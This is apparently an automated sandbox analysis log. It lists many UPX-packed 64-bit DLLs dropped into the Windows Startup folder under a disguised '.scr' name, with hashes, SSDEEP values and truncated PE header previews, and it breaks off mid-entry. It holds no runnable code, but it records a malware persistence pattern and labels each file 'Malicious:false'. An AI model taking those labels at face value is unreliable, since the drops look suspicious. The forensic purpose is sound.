                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11776
                                                                                                    Entropy (8bit):6.956704833587183
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:m3LNqWu7xr5InY8MmVO+AHO4dgOieWNkYj273QJXRHPnX:8vuZ/3xHO4dx1IZa7gJX1X
                                                                                                    MD5:58DF499FB55A2DF3BB895DD43FC4CBCE
                                                                                                    SHA1:4FBEB2493D4F4DD927EAC90B94D0448F39461485
                                                                                                    SHA-256:4D40BD4FD03C55B8B0FE6376DC6742E9B4CD561692B834CF1BBA6D9C75DE4161
                                                                                                    SHA-512:E7952C7022D4631232D2F0EF9BB4679FF607E9E96026087231C6FF2A1492D0568676A1ECC55381D0AA344D442A19F261514BA28D657FA1B401305211035DD5F9
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d....B.f.........." .....0...............................................................`.........................................L...........\............`..............H..........................................8...........................................UPX0....................................UPX1.....0.......&..................@....rsrc................*..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10240
                                                                                                    Entropy (8bit):6.707786287792808
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:aMrOwIMFi0ZIPRK4EtpwEHW8SVkYj273QJXD3pT:aMrKMFiFK4KL28SVZa7gJXV
                                                                                                    MD5:A1AC6B0EA42C29F07B7A0849087DFAF1
                                                                                                    SHA1:564FECFD6BB4377F054FBCC834C3D9D74A368F4A
                                                                                                    SHA-256:312BAA2D21284EAE2C6EF054404A2E6672D8DF0A37FDC5DBB295783CEFF59DB8
                                                                                                    SHA-512:399B4683491377492BF24212136A21C00CB2DE789F52DCCD16566D4275319100C1D75964B21666C8D0856D833E2DE499439BA67222226875E64D791D1C657A36
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d....B.f.........." ..... .......p........................................................`.........................................L..........\............P..X.......................................................8...........................................UPX0.....p..............................UPX1..... ....... ..................@....rsrc................$..............@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11264
                                                                                                    Entropy (8bit):7.068591256304915
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:7urOwIMFi0ZI2ZdnYIvCVCZKCyvkYj273QJX1nre30:KrKMFiKZdnScZVyvZa7gJXdO
                                                                                                    MD5:1DD074C11A4EF7A5B376BE6CC1CA0E3D
                                                                                                    SHA1:774DA8EF58C3EF8F638914C73EAF793508C0961A
                                                                                                    SHA-256:AA8F4127FC1A390050814698524935016C1DCF17F817EF90F27C1A6872B01B9B
                                                                                                    SHA-512:755D021A265116F13CCB84016FBDD32CD4DE02F4BB026C757029C2B27432846B6C08A9B6A3C125A1BCFF04113AA583629CB5E97A9DC4784B6DB7E3FE8B910B6B
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d....B.f.........." .....0.......p..0.....................................................`.........................................L..........\............P..@...................................................0...8...........................................UPX0.....p..............................UPX1.....0.......$..................@....rsrc................(..............@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11264
                                                                                                    Entropy (8bit):7.000866222279469
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:qOqrOwIMFi0ZI2b8JcuFqNF4m2nlQXku1GhkYj273QJXbnKu3p:6rKMFiKgJcuUNFEeP1GhZa7gJX2+
                                                                                                    MD5:B045025263FA214A5047E99DE3240FA1
                                                                                                    SHA1:555C399E79B708E8129EACF4E014E48F40DF08A2
                                                                                                    SHA-256:66C2FDCCC5E1398558B11168CBF8AB29E7D13F2D5A33E66FBA017BB0E436FE80
                                                                                                    SHA-512:F66DCC3B7808DA4A768C9C21D1D99DE1360C0CEF77F61902D2DBCB21CD7D05FE6E35ED9D0632BC824A6E332C7A78AFA80DAF303E1D11CC8FB7EDBF38799AD544
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d....B.f.........." .....0.......p........................................................`.........................................L..........\............P..@.......................................................8...........................................UPX0.....p..............................UPX1.....0.......$..................@....rsrc................(..............@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10752
                                                                                                    Entropy (8bit):6.904887755335672
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:jC1XDqrH2n4sLKhXRJRzkQMz0jofHNkYj273QJXinoY/R:8qryjyXRLAQE08fHNZa7gJXl8R
                                                                                                    MD5:8B31640091C9BA6E7032F6BB68F88EBF
                                                                                                    SHA1:CA48B8D3369066B2B75E4EA1B6933B1C57FE93E7
                                                                                                    SHA-256:A98FBC2EFCDB4DAF4FEEE163F56F7C5C0290E536C1EA4B3E9A092FA99963E54C
                                                                                                    SHA-512:1BAC328EC7D9A7C0A3806494414C9DA22227356F6D711EE33ADC0771BA3FF52D79CEA686EBF563F0016F1CB88560141EEA0A851DFA891D52B9EAE331BA846293
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d....B.f.........." .....0.......p........................................................`.........................................L..........\............P..(...............$.......................................8...........................................UPX0.....p..............................UPX1.....0......."..................@....rsrc................&..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10752
                                                                                                    Entropy (8bit):6.983907880110874
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:mJm23TF55OsDTBHeLMU+0w+Ei0J/Tta+kHYkYj273QJXbnBokQ:uzUsDTt0y+iFqYZa7gJX9HQ
                                                                                                    MD5:6A1B049B13ABBDAE8E70E5C8629B9CB1
                                                                                                    SHA1:4C53EBB5BC9E76D0DA94A704F39FEA7CC2FE3388
                                                                                                    SHA-256:CAF2B6E6EF7AEA318AB4358B8EF64B2498C2960984B704AD5622FCDCE65EB606
                                                                                                    SHA-512:BB36596F220B21FB2A9AFC28288B7A9857E7E1A20ACEF77CBB9E217B814ABF798C8D45190C6A909C21611336CA29FAEC8830046AE545B8A61B74BE0BA020C9AA
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d....B.f.........." .....0.......p..0.....................................................`.........................................L..........\............P..(...................................................0...8...........................................UPX0.....p..............................UPX1.....0......."..................@....rsrc................&..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12288
                                                                                                    Entropy (8bit):7.097480895716663
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:un1clPrWUqC02ilACSK7TzeWT1ekG4HDQr+Hh2i58gD9uzAFyCeJkYj273QJXZn7:eClPrr02SNPSmJG4rMimnJZa7gJXQ
                                                                                                    MD5:3230E1ECFBAAA7406E059C481DF71D00
                                                                                                    SHA1:012C24B1758D8A51A3D0C18DBE20542D24D3FCC1
                                                                                                    SHA-256:77B2B80E0CA6E90C08585A4C6396588B6BAC27BAA60E810BE66879E405E713BF
                                                                                                    SHA-512:9A6E9B8335340158C8CD93F7CC2D5621873C1C263A80CBAF8E27AB87DB648C12EF830D630C7E15897B8697FAE7731F0897A528DAD9DA6A40660A6E5083AD591E
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d....B.f.........." .....0.......p........................................................`.........................................L..........\............P..X.......................................................8...........................................UPX0.....p..............................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10752
                                                                                                    Entropy (8bit):7.0862120258622125
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:YRrOwIMFi0ZI+5/f8WjXICC4eGi//I/qkYj273QJXhnt/u:grKMFiqhfFXIRhDg/qZa7gJXX2
                                                                                                    MD5:99578793AF263520592F4A591E1145E5
                                                                                                    SHA1:A555806881BFEDCB7CCD6521EF03345191B9D43E
                                                                                                    SHA-256:06C01F5E5E18FA4B6943520A94B64AC4E9E0E5AE72A1DEE5A66F38145DF46D4F
                                                                                                    SHA-512:AEB40B897815F24C4DB87A18748193DCFAA4B4B6F41E8FC1506115D8527295C2BCE52D4B98CAA0B8B0137CDB35F8F328B0BA62029197EC4308966E25D1C271D0
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d....B.f.........." .....0.......p........................................................`.........................................L..........\............P..............$...........................................8...........................................UPX0.....p..............................UPX1.....0......."..................@....rsrc................&..............@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):13312
                                                                                                    Entropy (8bit):7.2167531927207245
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:G3LNqWu7xr5e0B08ZKY34+170LmTIHeIQUAR2TkYj273QJXLH68:cvuJRZr/1SSIHS5aZa7gJX2
                                                                                                    MD5:A7842C3F92F6F6EFF367B97BBC2B6102
                                                                                                    SHA1:CEE3D69682FBB560748C6D2A7D83BF668287E7B9
                                                                                                    SHA-256:315788043C7964CD2B5C887EC2BE990C05B071683F13D425F6E4127940F9FE1A
                                                                                                    SHA-512:092D431F50A3D4B06929296B996A510A39A4EEBC1A1B77895A2857CFE652DB6F348D9C57E777854D5689445F26F47FA2CA87140D84BB2F2F6F2FC7536840440C
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d....B.f.........." .....0...............................................................`.........................................L...........\............`..X...........$..........................................8...........................................UPX0....................................UPX1.....0.......,..................@....rsrc................0..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14848
                                                                                                    Entropy (8bit):7.25730148801507
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:/5bL5JdKCy6Lqo3CxYzoA+sm/Nd6tZa7gJXb:/Nd86LfCyzoA3mlipL
                                                                                                    MD5:84DEE4772C2448FE59EF9710B26DEB70
                                                                                                    SHA1:1C6ADC59EBF77A8ADD97C91C5DC3FE2B14F8286C
                                                                                                    SHA-256:B6B1AFD1F2ABB236CE89A84ABFC8930DA7F2D938D2DFF0321B39AB6624E3C107
                                                                                                    SHA-512:4A4ADCD34B9EDD6CD0A12AA46C69B071CD6E5EFA62C2467FA70031BB754F74342E9BDAB38B8045532AA2A5D3E5FE91E849150E00BD47203A83FCCC38C95B7C67
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d....B.f.........." .....@...............................................................`.........................................L...........\............p..............4... ......................................8...........................................UPX0....................................UPX1.....@.......2..................@....rsrc................6..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14848
                                                                                                    Entropy (8bit):7.257922783553551
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:n5bL5JdKCy6L/58g+eYXELL43mi12j9+YPZa7gJXb:nNd86L/yNjULLK1qospL
                                                                                                    MD5:A7B3AA9442D0F0591533EFCBA15BBDA0
                                                                                                    SHA1:38CE95337D39B97AE51AC8E7F18332834DCEEABE
                                                                                                    SHA-256:61AF39842B76E0ACF21A06757B6766725E3F581D52388119384C61167F26066E
                                                                                                    SHA-512:522EFDB0347D52FBEDEDF663EF2B3009B777359372B219DAB6850F31C5DA4D732C6E3269C76FC9BB5B584293861E326861B7F6590596F5A71ADB6DEE2F674D07
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d....B.f.........." .....@...............................................................`.........................................L...........\............p..............4... ......................................8...........................................UPX0....................................UPX1.....@.......2..................@....rsrc................6..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15360
                                                                                                    Entropy (8bit):7.335755435809611
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:5aQeWO7PzpfLJigFDR0h7UiBKgcDZa7gJXd:uWCPlfVh3y7DBqpt
                                                                                                    MD5:6CA018B74B76E1E2B8FCF4CE07C303AA
                                                                                                    SHA1:BE091FE1D44920FD9DE07AAF37E01A20A1648496
                                                                                                    SHA-256:DC4EB71114E4AB1F4B01A3644D882F3CD044CABF645F69AF6DEF559173CB5C39
                                                                                                    SHA-512:54B645AE48FA108FFBE6A96B0C307B27E1C4C260012AD9466B5EBC27C35882E65732584AAE74FE837F0FD0C1EB71A80582516C16F5C7854687EEEDB3EC5AEB82
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d....B.f.........." .....@..........p.....................................................`.........................................L...........\...........................4.......................................p...8...........................................UPX0....................................UPX1.....@.......4..................@....rsrc................8..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15360
                                                                                                    Entropy (8bit):7.409839557756001
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:laQeWdfOexy9B3MC0uklIrDOxnvZa7gJXQ:6Wg2yjF0GDOxvpg
                                                                                                    MD5:9596A926BE1B802943D69CD72F085875
                                                                                                    SHA1:0CD070F5187D2E5AB23D207F3BAD9803CF5D59BF
                                                                                                    SHA-256:3366F9B1582D55B26D6B1A0FFB1FB048FCC4F39A743435F34FEE6EFA513AF68A
                                                                                                    SHA-512:B7BB2EE7C889AB89E970904B86FC897CF1D91DDD6CABB9A619C729E040590530CD5AF14B028FE3952ABB424291306853C4B098008221E0FD8B1448A25BC3E158
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d....B.f.........." .....@..........@.....................................................`.........................................L...........\...........................4.......................................@...8...........................................UPX0....................................UPX1.....@.......4..................@....rsrc................8..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10240
                                                                                                    Entropy (8bit):6.966315070107828
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:d+e1CChUEjQPmO8MkWRlRJ/UB6FRsc6LUHkYj273QJXu3bpt:8JVFlUB6jsclHZa7gJX2
                                                                                                    MD5:875F67D1C1F22890C9F4A480A81514B2
                                                                                                    SHA1:B8DAE4690F74E80AA498879CB90D687C6DDFA155
                                                                                                    SHA-256:5C7850C9DA6DCF0401C87BAAA798E8D185D3CB698C01A4887A128B6FFABE6FDA
                                                                                                    SHA-512:BDA286C31F3A207BB564372766F9531AE8AF6A70857DDF0022107155D6FEA7CC920E50AAE5C37605A03E175C1E5EFB1153BB02A3790965CF2EB0548281B656D6
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^J.6?$.6?$.6?$.?G..2?$.dJ%.4?$.}G%.5?$.6?%..?$.dJ!.<?$.dJ .>?$.dJ'.5?$..J,.7?$..J$.7?$..J..7?$..J&.7?$.Rich6?$.........................PE..d....B.f.........." ..... .......p........................................................`.........................................T..........d............P..........................................................8...........................................UPX0.....p..............................UPX1..... ....... ..................@....rsrc................$..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10752
                                                                                                    Entropy (8bit):6.848589271557058
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:cZ1CChUEjQPmO8HCD/yQEVJLflLfB1fdHrkYj273QJX8nEJ:fJ6A9IJLdfB1fdHrZa7gJX3
                                                                                                    MD5:376E3926BF4C1019C24EB79A6FFE4641
                                                                                                    SHA1:89EF367F3C4C67A92D4B11E586C7FB4A1FBFFDB0
                                                                                                    SHA-256:0D821A22253F86B5E038F9AC984A96F0C722CA6F88F5839CA9CF6D9D5ED6F3E5
                                                                                                    SHA-512:E3C7234CB92B79EE08EB4FF454EB7FCCF779A5F6A10D34E2653C5B1CD5FABDB4DAF28800D1F009D6FC1CF2612D4DAE328392D044D9B91EB73C00FAE123874D75
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d....B.f.........." .....0.......p..0.....................................................`.........................................L..........\............P..X...............$...................................0...8...........................................UPX0.....p..............................UPX1.....0......."..................@....rsrc................&..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12288
                                                                                                    Entropy (8bit):7.01917247207309
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:zu1oHdD3VpsdrqkCphVavitay5xyvCBfd9Gkmy7jrkYj273QJX0nJ7:R3fKTCxavinyaZes7jrZa7gJXG
                                                                                                    MD5:B97CBAC01C36E1B10A950F363CAF103C
                                                                                                    SHA1:DD308277D7E59E009B7611B7147A57CDEA1BDD5A
                                                                                                    SHA-256:7BF3D6A3ABA2139870578F295BDEF5E92F03BD6D0EA395EF75006E2403DD36C8
                                                                                                    SHA-512:DED8C18DAF4A0203F0A4BFCBFCF93948B54C5D312AB8727EB89D4EBB9C9C57CFFC18EA92ACF93F0C8CF83F73CBDA1F00D550860FBF6875CFD1249C04D60595D2
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d....B.f.........." .....0.......p.......................................................`.........................................L..........\............P..X...........@..........................................8...........................................UPX0.....p..............................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11776
                                                                                                    Entropy (8bit):7.0318442071811935
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:h6D17kMnWzpM3mXoEdh29xFeOSegQtNkYj273QJXtnME:hHMWzpMWXoEbFOSegQtNZa7gJXu
                                                                                                    MD5:C6D85BE27EDCEEF3D644862F57DBDAC4
                                                                                                    SHA1:BD40CC62BFBFB739E317C773426F8B76EAD3EC60
                                                                                                    SHA-256:7646318391671E53ADC1E460BDC3A01A2A0F7EA8FE6AABD518638E8915809B04
                                                                                                    SHA-512:FB77CF7CA1E44C37D1134F27368CFEF960F06C407367F2253B0CD1A667C123B6544D8E6F97F0F00C9FEAA238EBD7A97DC4CCA398D052800149889045D5C79D6F
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d....B.f.........." .....0.......p........................................................`.........................................L..........\............P..|.......................................................8...........................................UPX0.....p..............................UPX1.....0.......&..................@....rsrc................*..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):20480
                                                                                                    Entropy (8bit):7.582798540061785
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:xCPYY2Eqk95s92Jd5yYA2ocvSmO8wapXyxIgTeS488UuOZa7gJXx:8wY2pk9dHKWvSlDQcI1KHph
                                                                                                    MD5:6CD325DA5C7A262E9DF46BF0DB031C94
                                                                                                    SHA1:CF414B5463E80FD3E50F35DD348E89DB1EE0C792
                                                                                                    SHA-256:B68A478487369BBE5410931DB02DEFC159C2CE32BFE49A2686BEE7D60B0994CD
                                                                                                    SHA-512:E7065D81A0DCA418C3746266530029E3280CCD2287B5260885C11EAC5A769480938BB009517D865DBD336644D0D3103B9A3A61C9B22C476875328CE2A275036C
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..P~...~...~...w.3.x...,...|...5...}...~...U...,...u...,...v...,...}.......|............._.............Rich~...................PE..d....B.f.........." .....P.......... .....................................................`.........................................L...|.......\...............<................................................... ...8...........................................UPX0....................................UPX1.....P.......H..................@....rsrc................L..............@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10240
                                                                                                    Entropy (8bit):6.781528095877668
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:rE1QdqOkpEh83hgAXfW2OAAhpZwkYj273QJX43Oyb:rPqO+Eh8xgAX+2OZPwZa7gJXV
                                                                                                    MD5:FF2676B925D79778F1F1F8C4B310C32E
                                                                                                    SHA1:B87400CCDF1F579E6AAF663610E9833828FE4C9A
                                                                                                    SHA-256:324CEDEA6443960781DEF946D52B7097F6E36EDA9C53A70EA084B30E9A4E16C3
                                                                                                    SHA-512:2FDF426781D576A6AC8E697EB1972A81D9EA57B0015851DC188CC9CEDFAE613B09D4978583F1365CF3DDD42C0911FC3C2998237B7B622F164B6F09DDE8087C93
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^:.6?T.6?T.6?T.?G..2?T.dJU.4?T.}GU.5?T.6?U..?T.dJQ.<?T.dJP.>?T.dJW.5?T..J\.7?T..JT.7?T..J..7?T..JV.7?T.Rich6?T.........................PE..d....B.f.........." ..... .......p........................................................`.........................................L...d......\............P..4.......................................................8...........................................UPX0.....p..............................UPX1..... ....... ..................@....rsrc................$..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14336
                                                                                                    Entropy (8bit):7.2659734254328745
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:XNdFl9xgCYsB43vddIU5PU7XBtKZI0TWTMxpfEVt5jhjBDbvDkYj273QJXO3R2A:XNdQPj3vdJ87fWT3xy193DZa7gJXA2
                                                                                                    MD5:102777C103C67B7661BD9FF4A32D21F0
                                                                                                    SHA1:0A8E547C23F577865EB1B39A4501F1C60564F19A
                                                                                                    SHA-256:DCE2E49EBD670F036E5BBFAA7101BE4597B7C71A8D544DCC58F3AC920492A376
                                                                                                    SHA-512:CF6A287535C20229071447B9617A33301968142C456E6E1950EE0828B44807963237A404719603301C505B3E81E7DE980CB9112FE015CA7E18C16F83CEC64421
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d....B.f.........." .....0..........P.....................................................`.........................................L...........\............p..............L.......................................P...8...........................................UPX0....................................UPX1.....0.......0..................@....rsrc................4..............@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):26624
                                                                                                    Entropy (8bit):7.7091768623692705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:NGkgn0uw0f9tuMgZj6SgoM+mHh8zBhOsgpS:Qk60qf1SxM+Sh8zBZV
                                                                                                    MD5:BE200409DA5622C3F060A683A5F3D417
                                                                                                    SHA1:B0E69D75630549C9F1CA74DAA830BD7382421E81
